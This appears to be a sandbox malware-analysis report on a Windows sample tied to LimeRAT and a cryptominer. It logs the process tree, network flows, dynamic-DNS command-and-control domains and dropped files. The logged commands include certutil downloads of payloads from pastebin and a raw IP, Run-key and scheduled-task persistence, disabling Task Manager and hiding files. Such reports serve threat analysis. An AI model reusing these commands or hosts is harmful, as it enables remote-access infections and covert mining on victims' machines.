Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 2, 2022, 8:56 a.m. | May 2, 2022, 8:58 a.m. |
cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe"
3068-
certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/GUqDzHQW C:\Users\test22\AppData\Local\Temp\version.bat
2156 -
certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/h6SvjTQp C:\Users\test22\AppData\Local\Temp\hosting.bat
2276 -
certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/DVn2TV4Q C:\Users\test22\AppData\Local\Temp\versioncd.bat
196 -
cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\hosting.bat"
2608 -
cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\version.bat"
2740 -
cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\versioncd.bat"
2976 -
WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
2896 -
WMIC.exe wmic process where name='taskmgr.exe' delete
1664 -
WMIC.exe wmic process where name='Taskmgr.exe' delete
2264 -
WMIC.exe wmic process where name='xmrig.exe' delete
2296 -
reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2456 -
reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
204 -
reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
1756 -
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\z.vbs"
2568-
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\z.vbs"
192
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\helps.vbs"
2860-
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\helps.vbs"
2840
schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe'"
2828 -
winlogins.exe "C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe"
2256
xcopy.exe xcopy /y "C:\Users\test22\AppData\Local\Temp\updateW\winupdate.exe" "C:\Users\test22\AppData\Roaming\AppData\Windows Updates"
3056 -
attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Updates\*.*"
1660 -
attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Updates"
2104 -
attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Protector\*.*"
2416 -
attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Protector"
792 -
attrib.exe attrib -s -h "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
2212 -
xcopy.exe xcopy /y "C:\Users\test22\AppData\Local\Temp\updateW\Microsoft.com" "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
2604 -
attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
2916 -
WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
2352 -
attrib.exe attrib -s -h "C:\Windows (x86)\*.*"
2632 -
certutil.exe certutil -urlcache -split -f "http://54.254.238.33/xm/win.com" C:\Users\test22\AppData\Local\Temp\updateW\win.com
2940 -
certutil.exe certutil -urlcache -split -f "http://54.254.238.33/xm/64a1.com" C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
3232 -
cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\B4B4.tmp\B4C5.bat "C:\Windows (x86)\xagal.exe""
4008-
certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/GUqDzHQW "C:\Windows (x86)\version.bat"
176 -
cmd.exe cmd /c del "C:\Windows (x86)\version.bat"
3244 -
cmd.exe C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
2320-
WMIC.exe wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
3532
WMIC.exe wmic process where name='xagal.exe' delete
2328 -
explorer.exe "C:\Windows (x86)\explorer.exe"
3836 -
cmd.exe cmd /c del "C:\Windows (x86)\xcls.bat"
1968
win.com "C:\Users\test22\AppData\Local\Temp\updateW\win.com"
3648 -
PING.EXE ping 127.0.0.1 -n 5
3848 -
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\runx.vbs"
296-
WMIC.exe wmic process where name='windowsapp.exe' delete
2072
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49167 104.20.67.143:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49174 104.20.67.143:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49175 104.20.67.143:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49168 104.20.67.143:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49170 104.20.67.143:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49172 104.20.67.143:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49224 104.20.67.143:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49239 104.20.67.143:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49244 104.20.67.143:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLS 1.3 192.168.56.101:49274 131.153.76.130:80 | None | None | None |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
pdb_path | D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb |
section | .gfids |
resource name | PNG |
suspicious_features | Connection to IP address | suspicious_request | GET http://54.254.238.33/xm/win.com |
suspicious_features | Connection to IP address | suspicious_request | GET http://54.254.238.33/xm/64a1.com |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://pastebin.com/raw/nEZ87Pwx |
domain | niogem1171.ddns.net |
domain | muslada2251.ddns.net |
domain | rinot972.ddns.net |
domain | marena9201.ddns.net |
domain | muslada2251.myvnc.com |
domain | niogem1171.myvnc.com |
domain | muslada2251.servebeer.com |
domain | niogem1171.servebeer.com |
domain | niogem1171.serveminecraft.net |
domain | muslada2251.serveminecraft.net |
domain | muslada2251.serveblog.net |
domain | niogem1171.serveblog.net |
domain | niogem1171.servecounterstrike.com |
domain | muslada2251.servecounterstrike.com |
domain | muslada2251.servehttp.com |
domain | niogem1171.servehttp.com |
domain | marena9201.bounceme.net |
domain | niogem1171.bounceme.net |
domain | muslada2251.bounceme.net |
domain | muslada2251.servequake.com |
domain | niogem1171.servequake.com |
domain | marena9201.3utilities.com |
domain | niogem1171.3utilities.com |
domain | muslada2251.3utilities.com |
domain | muslada2251.redirectme.net |
domain | niogem1171.redirectme.net |
domain | muslada2251.servehalflife.com |
domain | niogem1171.servehalflife.com |
domain | niogem1171.zapto.org |
domain | muslada2251.zapto.org |
domain | muslada2251.hopto.org |
domain | niogem1171.hopto.org |
domain | muslada2251.sytes.net |
domain | niogem1171.sytes.net |
domain | niogem1171.serveftp.com |
domain | muslada2251.serveftp.com |
domain | niogem1171.servemp3.com |
domain | muslada2251.servemp3.com |
domain | muslada2251.myftp.org |
domain | muslada2251.myftp.biz |
domain | niogem1171.myftp.biz |
domain | niogem1171.myftp.org |
domain | niogem1171.servegame.com |
domain | muslada2251.servegame.com |
domain | rinot972.ddnsking.com |
domain | niogem1171.ddnsking.com |
domain | marena9201.ddnsking.com |
domain | muslada2251.ddnsking.com |
request | GET http://54.254.238.33/xm/win.com |
request | GET http://54.254.238.33/xm/64a1.com |
request | GET https://pastebin.com/raw/GUqDzHQW |
request | GET https://pastebin.com/raw/h6SvjTQp |
request | GET https://pastebin.com/raw/DVn2TV4Q |
request | GET https://pastebin.com/raw/nEZ87Pwx |
description | wscript.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds |
description | winlogins.exe tried to sleep 219 seconds, actually delayed analysis time by 219 seconds |
file | C:\Windows (x86)\KBDMLT48.DLL |
file | C:\Windows (x86)\KBDBE.DLL |
file | C:\Windows (x86)\KBDCZ1.DLL |
file | C:\Windows (x86)\TRACERT.EXE |
file | C:\Windows (x86)\KBDLT.DLL |
file | C:\Users\test22\AppData\Local\Temp\versioncd.bat |
file | C:\Windows (x86)\KBDMYAN.DLL |
file | C:\Windows (x86)\KBDAZST.DLL |
file | C:\Windows (x86)\KBDNTL.DLL |
file | C:\Windows (x86)\KBDA2.DLL |
file | C:\Windows (x86)\KBDBENE.DLL |
file | C:\Windows (x86)\icmp.dll |
file | C:\Windows (x86)\KBDINDEV.DLL |
file | C:\Windows (x86)\asferror.dll |
file | C:\Windows (x86)\kbdgeoer.dll |
file | C:\Windows (x86)\KBDPASH.DLL |
file | C:\Windows (x86)\KBDBR.DLL |
file | C:\Windows (x86)\tier2punctuations.dll |
file | C:\Windows (x86)\KBDINTAM.DLL |
file | C:\Windows (x86)\KBDMONST.DLL |
file | C:\Users\test22\AppData\Local\Temp\hosting.bat |
file | C:\Windows (x86)\KBDHU.DLL |
file | C:\Windows (x86)\KBDSMSFI.DLL |
file | C:\Windows (x86)\KBDUKX.DLL |
file | C:\Windows (x86)\kbdax2.dll |
file | C:\Windows (x86)\KBDFR.DLL |
file | C:\Windows (x86)\KBDYCC.DLL |
file | C:\Windows (x86)\KBDINBE1.DLL |
file | C:\Windows (x86)\kbd101a.dll |
file | C:\Windows (x86)\KBDTUF.DLL |
file | C:\Windows (x86)\KBDBLR.DLL |
file | C:\Windows (x86)\KBDTUQ.DLL |
file | C:\Windows (x86)\KBDFTHRK.DLL |
file | C:\Windows (x86)\KBDIBO.DLL |
file | C:\Windows (x86)\kbd106.dll |
file | C:\Windows (x86)\KBDLT2.DLL |
file | C:\Users\test22\AppData\Local\Temp\version.bat |
file | C:\Windows (x86)\KBDTH3.DLL |
file | C:\Windows (x86)\KBDIT142.DLL |
file | C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe |
file | C:\Windows (x86)\KBDSL1.DLL |
file | C:\Windows (x86)\KBDRU.DLL |
file | C:\Windows (x86)\KBDUSL.DLL |
file | C:\Windows (x86)\KBDJAV.DLL |
file | C:\Windows (x86)\KBDMACST.DLL |
file | C:\Windows (x86)\KBDINASA.DLL |
file | C:\Windows (x86)\KBDDV.DLL |
file | C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat |
file | C:\Windows (x86)\kbdgeoqw.dll |
file | C:\Windows (x86)\KBDMAORI.DLL |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.pyw - 바로 가기.lnk |
cmdline | wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list |
cmdline | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe" |
cmdline | wmic process where name='windowsapp.exe' delete |
cmdline | schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe'" |
cmdline | wmic csproduct get UUID /format:list |
cmdline | wmic process where name='taskmgr.exe' delete |
cmdline | wmic process where name='xmrig.exe' delete |
cmdline | wmic process where name='Taskmgr.exe' delete |
cmdline | C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list |find "=" |
cmdline | wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete |
cmdline | "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\B4B4.tmp\B4C5.bat "C:\Windows (x86)\xagal.exe"" |
cmdline | wmic process where name='xagal.exe' delete |
cmdline | C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list |
file | C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe |
file | C:\Users\test22\AppData\Local\Temp\updateW\winlogins.exe |
file | C:\Users\test22\AppData\Local\Temp\updateW\64a1.com |
file | C:\Users\test22\AppData\Local\Temp\updateW\win.com |
file | C:\Users\test22\AppData\Local\Temp\updateW\runx.vbs |
file | C:\Windows (x86)\xagal.exe |
file | C:\Windows (x86)\run.vbs |
file | C:\Users\test22\AppData\Local\Temp\updateW\1xcls.bat |
file | C:\Windows (x86)\xcls.bat |
file | C:\Windows (x86)\explorer.exe |
file | C:\Users\test22\AppData\Local\Temp\updateW\64a1.com |
file | C:\Users\test22\AppData\Local\Temp\updateW\csrss.exe |
file | C:\Users\test22\AppData\Local\Temp\updateW\win.com |
file | C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe |
file | C:\Users\test22\AppData\Local\Temp\updateW\winlogins.exe |
file | C:\Users\test22\AppData\Local\Temp\IE.exe |